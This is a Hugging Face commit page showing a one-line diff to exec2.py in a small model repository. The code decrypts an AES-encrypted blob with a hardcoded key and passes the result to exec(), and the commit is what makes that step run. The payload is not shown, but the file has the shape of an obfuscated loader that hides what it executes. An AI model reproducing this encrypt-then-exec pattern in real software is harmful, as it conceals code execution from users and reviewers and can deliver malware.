Hugging Face
Models
Datasets
Spaces
Buckets
new
Docs
Enterprise
Pricing
Website
Tasks
HuggingChat
Collections
Languages
Organizations
Community
Blog
Posts
Daily Papers
Learn
Discord
Forum
GitHub
Solutions
Team & Enterprise
Hugging Face PRO
Enterprise Support
Inference Providers
Inference Endpoints
Storage Buckets
Log In
Sign Up
saddd
/
123
like
0
doi:10.57967/hf/1136
Model card
Files
Files and versions
xet
Community
Copy to bucket
new
saddd
commited on
Sep 21, 2023
Commit
c4ff84c
·
1 Parent(s):
d4a5423
Update exec2.py
Browse files
Files changed (1)
hide
show
exec2.py
+1
-1
exec2.py
CHANGED
Viewed
@@ -15,4 +15,4 @@ yd_key = "W8BWbk3Bi0/7fElbVvUOfw=="
15
yd_data = aes_decrypt(yd, yd_key)
16
17
#在data.txt文件中查看解密内容
18
-
exec(
yd_code
)
15
yd_data = aes_decrypt(yd, yd_key)
16
17
#在data.txt文件中查看解密内容
18
+
exec(
yd_data
)